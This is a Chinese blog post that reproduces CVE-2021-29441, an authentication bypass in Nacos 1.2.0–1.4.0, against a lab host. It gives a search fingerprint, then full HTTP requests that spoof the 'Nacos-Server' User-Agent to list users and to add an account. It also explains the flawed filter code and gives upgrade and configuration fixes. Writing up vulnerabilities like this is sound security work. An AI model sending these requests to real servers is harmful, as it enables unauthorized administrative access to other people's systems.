Nacos认证绕过漏洞(CVE-2021-29441)

最新推荐文章于 2024-06-20 14:41:28 发布
最新推荐文章于 2024-06-20 14:41:28 发布
阅读量1.9k 收藏
点赞数
分类专栏: 从入门到入狱 文章标签: java 网络 安全 运维 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18980147/article/details/128348741
版权

Nacos认证绕过漏洞(CVE-2021-29441)

指纹识别

title=nacos

漏洞范围

nacos1.2.0版本-nacos1.4.0版本

漏洞复现

靶机ip:192.168.1.4

默认的nacos登录界面

http://192.168.1.14:8848/nacos/#/login

在这里插入图片描述

利用如下请求包查看只有一个nacos用户

GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
Host: 192.168.1.14:8848
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close

在这里插入图片描述

用如下请求包添加用户

POST /nacos/v1/auth/users?username=tpaer&password=123456 HTTP/1.1
Host: 192.168.1.14:8848
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

在这里插入图片描述

再次查看我们的用户增加了tpaer用户

在这里插入图片描述

用新用户登录进行验证,成功未授权访问绕过验证

在这里插入图片描述

漏洞原理

官方给出的文档描述

开启鉴权功能后,服务端之间的请求也会通过鉴权系统的影响。考虑到服务端之间的通信应该是可信的,因此在1.2~1.4.0版本期间,通过User-Agent中是否包含Nacos-Server来进行判断请求是否来自其他服务端。

但这种实现由于过于简单且固定,导致可能存在安全问题。因此从1.4.1版本开始,Nacos添加服务身份识别功能,用户可以自行配置服务端的Identity,不再使用User-Agent作为服务端请求的判断标准。

Nacos中的Auth Filter对User-Agent请求头进行了校验,如果为Constants.NACOS_SERVER_HEADER则直接放行,该值为"Nacos-Server"

String userAgent = WebUtils.getUserAgent(req);
        
if(StringUtils.startsWith(userAgent,Constants.NACOS_SERVER_HEADER)) {
    chain.doFilter(request, response);
    return;
}

漏洞修复

1.升级nacos版本(建议)

2.修改配置

tpaer
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
nacos配置中心nacos-server-2.2.3
08-16
总的来说,Nacos-server-2.2.3是为了解决分布式系统中的服务治理和配置管理问题而设计的工具,它集成了Java生态,提供了强大的配置管理和服务发现能力,而且2.2.3版本的发布意味着它已经过了一系列的改进和优化,...
nacos权限绕过漏洞(CVE-2021-29441)修复
热门推荐
CSDNHmCxy的博客
09-16 2万+
漏扫出服务器的nacos1.2.1版本存在权限绕过漏洞(CVE-2021-29441)漏洞,给出的建议是升级到最新版本,后面去nacos官网当时最新版本是2.0.3,果断换成了当时最新的再让安全人员漏扫发现还是存在,明明官网已经说2.0.0以上版本已经修复了,怎么还是被扫到呢?通过网上翻看资料得到如下解决办法: 1、修改 nacos的application.properties配置文件,开启服务身份识别功能 ### 开启鉴权 nacos.core.auth.enabled=true ### 关闭使用use
nacos未授权-CVE-2021-29441复现
crowsec
07-21 7703
Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。 该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单。。。...
Nacos漏洞总结复现
喜欢Python编程的程序员柚柚呀
06-20 383
Nacos漏洞总结复现 一、Nacos默认key导致权限绕过登陆 0x00 漏洞描述 Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致未授权访问漏洞。 通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户 0x01 漏洞影响 0.1.0 <= Nacos <= 2.2.0 0x02 漏洞搜索 fofa:app=“NACOS” 0x03 漏洞复现 在nacos中,token.secret.key值是固定死的,位置在conf下的appli
解决Alibaba Nacos 权限认证绕过漏洞 (CVE- - 2021- - 29441)亲测有效
majunssz的博客
04-22 1万+
解决Alibaba Nacos 权限认证绕过漏洞 (CVE- - 2021- - 29441)亲测有效 2.可以通过外网随意添加nacos用户名及密码
Nacos未授权访问漏洞CVE-2021-29441
Bird&Bird
03-11 9999
Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。 该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-S
Nacos权限绕过漏洞(CVE-2021-29441)复现
2301_76437855的博客
04-14 1720
CVE-2021-29441Nacos 组件中的一个权限验证漏洞,该漏洞允许未授权的攻击者绕过认证,进而获取服务器的敏感信息或执行未授权操作。把请求头中GET请求改成POST,User-Agent中的参数换成Nacos-Server,然后我添加了一个用户nbacba,密码一样。我们可以看见有一个叫nacos的用户,密码通过盐加密方法加密(nacos的初始用户名和密码都为nacos,有时候可以碰碰运气)升级 Nacos安全版本:Nacos 官方已发布修复此漏洞的版本。返回值为200,可以正常访问。
NACOS身份认证绕过漏洞批量检测poc.7z
02-24
然而,如同任何复杂的软件系统,NACOS也可能存在安全漏洞,其中之一就是“身份认证绕过漏洞”。 身份认证绕过漏洞通常指的是攻击者可以通过某种方式规避系统的身份验证机制,直接访问或操作本应受保护的资源。在...
Spring Security AuthenticatedVoter 权限绕过漏洞CVE-2024-22257)nacos版本
最新发布
07-23
Spring Security AuthenticatedVoter 权限绕过漏洞CVE-2024-22257)nacos修复版本
nacos 的两个源码版本:分别是 nacos-1.4.3 和 nacos-2.0.4
02-25
Nacos 的两个主要源码版本,即 nacos-1.4.3 和 nacos-2.0.4,分别代表了项目在不同阶段的发展成果,各自具有不同的特性和改进。 首先,我们来了解一下 Nacos 的核心功能。作为一个服务注册中心,Nacos 允许微服务...
nacos-server-2.0.3 nacos-server-2.0.3 nacos-server-2.0.3
04-08
nacos-server-2.0.3
【渗透实战】Nacos未授权访问(CVE-2021-29441
Nafia的博客
02-20 3202
Nacos未授权访问漏洞挖掘记录
Nacos漏洞修复】Nacos未授权访问漏洞(CVE-2021-29441)
m0_52985087的博客
03-20 5088
但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。命令:curl -X GET 'http://localhost:8848/nacos/v1/auth/users?命令:curl -X GET 'http://localhost:8848/nacos/v1/auth/users?命令:curl -X GET 'http://localhost:8848/nacos/v1/console/server/state'
Nacos 未授权访问(CVE-2021-29441)
m0_62207170的博客
08-30 983
Nacos 未授权访问(CVE-2021-29441)
NACOS漏洞问题及修复(CVE-2021-29441)
Hoopy_Hoopy的博客
09-14 1万+
目录 1.漏洞相关问题 2.场景复现 2.1访问用户列表界面 2.2添加新用户 2.3再次查看用户列表 3.nacos升级 4.代码升级 1.漏洞相关问题 漏洞相关地址 CVE-2021-29441 - Nacos is a platform designed for dynamic service discovery and configuration and service management. - CVE-Searchhttps://cve.circl.lu/cve/CVE-20
Alibaba Nacos权限认证绕过漏洞[CVE-2021-29441]
m0_54323635的博客
08-31 970
Alibaba Nacos是阿里巴巴的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。 该漏洞Nacos在进行认证授权操作时,会先判断user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。
Nacos 存在认证绕过漏洞CVE-2021-29441
北方的孤夜
06-04 1626
Nacos 存在认证绕过漏洞CVE-2021-29441
防止nacos 随意添加用户
gjp014的专栏
12-07 4121
nacos 配置
Nacos未授权访问修复方案
moonlingh的博客
03-24 4351
Nacos 是 SpringCloud Alibaba 微服务架构中的一个组件,主要作用是服务注册和发现以及分布式配置管理,通常情况下 Nacos 中存储着 MySQL、Redis 等数据库的账号和密码。当前使用的版本存在用户读取、添加、登陆的漏洞
nacos权限绕过漏洞(CVE-2021-29441)
10-26
nacos权限绕过漏洞(CVE-2021-29441)是指在nacos进行认证授权操作时,会判断请求的user-agent是否为"Nacos-Server",如果是的话则不进行任何认证。攻击者可以通过伪造请求头中的user-agent来绕过认证,获取到用户名...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值